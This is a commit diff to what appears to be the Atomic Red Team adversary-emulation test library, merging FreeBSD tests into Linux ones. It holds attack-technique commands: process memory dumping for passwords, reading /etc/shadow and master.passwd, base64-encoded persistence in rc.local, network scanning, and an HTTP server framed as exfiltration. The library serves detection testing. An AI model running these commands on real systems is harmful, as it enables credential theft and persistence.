FreeBSD Cleanup

redcanaryco · Nov 13, 2023 · 5044806 · 5044806
1 parent 8961c16
commit 5044806
Show file tree

Hide file tree

Showing 11 changed files with 70 additions and 245 deletions.
diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml
@@ -39,62 +39,23 @@ atomic_tests:
     command: |
       sh #{script_path}
       PID=$(pgrep -n -f "#{pid_term}")
-      HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
-      MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
-      MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
-      MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
-      dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
-      grep -i "PASS" "#{output_file}"
-    cleanup_command: |
-      rm -f "#{output_file}"
-
-- name: Dump individual process memory with sh on FreeBSD (Local)
-  auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
-  description: |
-    Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
-    copy process memory to an external file so it can be searched or exfiltrated later.
-    On FreeBSD procfs must be mounted.
-  supported_platforms:
-  - linux
-
-  input_arguments:
-    output_file:
-      description: Path where captured results will be placed
-      type: path
-      default: /tmp/T1003.007.bin
-    script_path:
-      description: Path to script generating the target process
-      type: path
-      default: /tmp/T1003.007.sh
-    pid_term:
-      description: Unique string to use to identify target process
-      type: string
-      default: T1003.007
-
-  dependencies:
-  - description: |
-      Script to launch target process must exist
-    prereq_command: |
-      test -f #{script_path}
-      grep "#{pid_term}" #{script_path}
-    get_prereq_command: |
-      echo '#!/bin/sh' > #{script_path}
-      echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
-
-  executor:
-    name: sh
-    elevation_required: true
-    command: |
-      sh #{script_path}
-      PID=$(pgrep -n -f "#{pid_term}")
-      MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
-      MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
-      MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
-      dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
-      strings "#{output_file}" | grep -i PASS
+      unamestr=$(uname)
+      if [ "$unamestr" = 'Linux' ]; then
+        HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+        MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+        MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+        MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+        dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+        grep -i "PASS" "#{output_file}"
+      elif [ "$unamestr" = 'FreeBSD' ]; then
+        MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
+        MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
+        MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
+        dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+        strings "#{output_file}" | grep -i PASS
+      fi
     cleanup_command: |
       rm -f "#{output_file}"
-
 - name: Dump individual process memory with Python (Local)
   auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
   description: |
@@ -188,13 +149,13 @@ atomic_tests:
     prereq_command: |
       if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      sudo apt-get -y install python2       
+      sudo apt-get -y install python2
   - description: |
       Libc-bin must be installed
     prereq_command: |
       if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      sudo apt-get -y install libc-bin        
+      sudo apt-get -y install libc-bin
   executor:
     command: |
       sudo #{MimiPenguin_Location} > #{output_file}

diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml
@@ -70,7 +70,12 @@ atomic_tests:
       default: /tmp/T1003.008.txt
   executor:
     command: |
-      echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
+      unamestr=$(uname)
+      if [ "$unamestr" = 'Linux' ]; then
+        echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
+      elif [ "$unamestr" = 'FreeBSD' ]; then
+        echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
+      fi
     cleanup_command: |
       rm -f #{output_file}
     name: sh
@@ -89,8 +94,10 @@ atomic_tests:
   executor:
     command: |
       testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
+      if [ $(uname) = 'FreeBSD' ]; then
+        testcat /etc/master.passwd
+      fi
       testcat /etc/passwd
-      testcat /etc/master.passwd
       testcat /etc/shadow
     cleanup_command: |
       rm -f #{output_file}

diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml
@@ -35,23 +35,17 @@ atomic_tests:
     cleanup_command: |
       del /f /q /s #{output_file} >nul 2>&1
     name: command_prompt
-- name: System Service Discovery - systemctl
+- name: System Service Discovery - systemctl/service
   auto_generated_guid: f4b26bce-4c2c-46c0-bcc5-fce062d38bef
   description: |
-    Enumerates system service using systemctl
+    Enumerates system service using systemctl/service
   supported_platforms:
   - linux
   executor:
     command: |
-      systemctl --type=service
-    name: bash
-- name: System Service Discovery - service
-  auto_generated_guid: b2e1c734-7336-40f9-b970-b04731cbaf8a
-  description: |
-    Enumerates system service using service
-  supported_platforms:
-  - linux
-  executor:
-    command: |
-      service -e
-    name: sh
+      if [ $(uname) = 'FreeBSD' ]; then
+        service -e
+      else
+        systemctl --type=service
+      fi
+    name: bash
diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml
@@ -33,7 +33,6 @@ atomic_tests:
   auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
   description: |
     Identify network configuration information.
-
     Upon successful execution, sh will spawn multiple commands and output will be via stdout.
   supported_platforms:
   - macos
@@ -51,21 +50,11 @@ atomic_tests:
       if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
       if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
       if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
-      if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
-    name: sh
-- name: System Network Configuration Discovery (freebsd)
-  auto_generated_guid: 7625b978-4efd-47de-8744-add270374bee
-  description: |
-    Identify network configuration information.
-
-    Upon successful execution, sh will spawn multiple commands and output will be via stdout.
-  supported_platforms:
-  - linux
-  executor:
-    command: |
-      if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
-      if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
-      if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
+      if [ $(uname) = 'FreeBSD' ]; then
+        if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
+      else
+        if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
+      fi;
     name: sh
 - name: System Network Configuration Discovery (TrickBot Style)
   auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2

diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
@@ -23,41 +23,18 @@ atomic_tests:
     prereq_command: |
       if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi
     get_prereq_command: |
-      echo "#{shell_command}" | base64 > /tmp/encoded.dat
+      if [ $(uname) = 'FreeBSD' ]; then
+        echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat
+      else
+        echo "#{shell_command}" | base64 > /tmp/encoded.dat  
+      fi
   executor:
     command: |
-      cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
-      chmod +x /tmp/art.sh
-      /tmp/art.sh
-    cleanup_command: |
-      rm /tmp/encoded.dat 
-      rm /tmp/art.sh
-    name: sh
-- name: Decode base64 Data into Script
-  auto_generated_guid: 197ed693-08e6-4958-bfd8-5974e291be6c
-  description: |
-    Creates a base64-encoded data file and decodes it into an executable shell script
-
-    Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` 
-    and uname -v
-  supported_platforms:
-  - linux
-  input_arguments:
-    shell_command:
-      description: command to encode
-      type: string
-      default: "echo Hello from the Atomic Red Team && uname -v"
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      encode the command into base64 file
-    prereq_command: |
-      exit 1
-    get_prereq_command: |
-      echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat
-  executor:
-    command: |
-      cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh
+      if [ $(uname) = 'FreeBSD' ]; then
+        cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh
+      else
+        cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
+      fi;
       chmod +x /tmp/art.sh
       /tmp/art.sh
     cleanup_command: |

diff --git a/atomics/T1036.006/T1036.006.yaml b/atomics/T1036.006/T1036.006.yaml
@@ -22,30 +22,17 @@ atomic_tests:
   supported_platforms:
   - macos
   - linux
-  executor:
-    name: bash
-    command: |
-      mkdir -p /tmp/atomic-test-T1036.006
-      cd /tmp/atomic-test-T1036.006
-      mkdir -p 'testdirwithspaceend '
-      /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init  '/;\nqx/'.\/init  ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
-      chmod +x 'testdirwithspaceend /init '
-      './testdirwithspaceend /init '
-    cleanup_command:
-      rm -rf /tmp/atomic-test-T1036.006
-- name: Space After Filename (FreeBSD)
-  auto_generated_guid: cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8
-  description: |
-    Space after filename.
-  supported_platforms:
-  - linux
   executor:
     name: sh
     command: |
       mkdir -p /tmp/atomic-test-T1036.006
       cd /tmp/atomic-test-T1036.006
       mkdir -p 'testdirwithspaceend '
-      /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init "      
+      if [ $(uname) = 'FreeBSD' ]; then
+        /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init "
+      else
+        /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init  '/;\nqx/'.\/init  ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
+      fi;
       chmod +x 'testdirwithspaceend /init '
       './testdirwithspaceend /init '
     cleanup_command:

diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
@@ -47,27 +47,14 @@ atomic_tests:
     elevation_required: true 
     command: | 
       filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
-      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+      if [ $(uname) = 'FreeBSD' ]; then 
+        alias python3=python3.9;
+        printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
+      else
+        printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local  
+      fi;
       echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
       printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
       sudo chmod +x /etc/rc.local
     cleanup_command: | 
       origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
-- name: rc.local (FreeBSD)
-  auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
-  description: |
-    Modify rc.local
-
-  supported_platforms:
-    - linux
-  executor:
-    name: sh
-    elevation_required: true 
-    command: | 
-      filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
-      printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
-      echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
-      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
-      sudo chmod +x /etc/rc.local
-    cleanup_command: | 
-      origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
@@ -23,7 +23,6 @@ atomic_tests:
   auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
   description: |
     Scan ports to check for listening ports with Nmap.
-
     Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
   supported_platforms:
   - linux
@@ -48,13 +47,13 @@ atomic_tests:
     prereq_command: |
       if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)
   - description: |
       Check if nc command exists on the machine
     prereq_command: |
       if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
+      (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)
   - description: |
       Check if telnet command exists on the machine
     prereq_command: |
@@ -68,42 +67,6 @@ atomic_tests:
       nc -nv #{host} #{port}
     name: sh
     elevation_required: true
-- name: Port Scan Nmap for FreeBSD
-  auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
-  description: |
-    Scan ports to check for listening ports with Nmap.
-
-    Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
-  supported_platforms:
-  - linux
-  input_arguments:
-    host:
-      description: Host to scan.
-      type: string
-      default: 192.168.1.1
-    port:
-      description: Ports to scan.
-      type: string
-      default: "80"
-    network_range:
-      description: Network Range to Scan.
-      type: string
-      default: 192.168.1.0/24
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if nmap command exists on the machine
-    prereq_command: |
-      if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      (which pkg && pkg install -y nmap)
-  executor:
-    command: |
-      nmap -sS #{network_range} -p #{port}
-      telnet #{host} #{port}
-      nc -nv #{host} #{port}
-    name: sh
-    elevation_required: true
 - name: Port Scan NMap for Windows
   auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
   description: Scan ports to check for listening ports for the local host 127.0.0.1

diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
@@ -215,15 +215,5 @@ atomic_tests:
     name: sh
     elevation_required: false
     command: |
+      if [ $(uname) = 'FreeBSD' ]; then alias python3=python3.9; fi;
       if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
-- name: Python3 http.server (freebsd)
-  auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b
-  description: |
-    An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
-  supported_platforms:
-  - linux
-  executor:
-    name: sh
-    elevation_required: false
-    command: |
-      if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi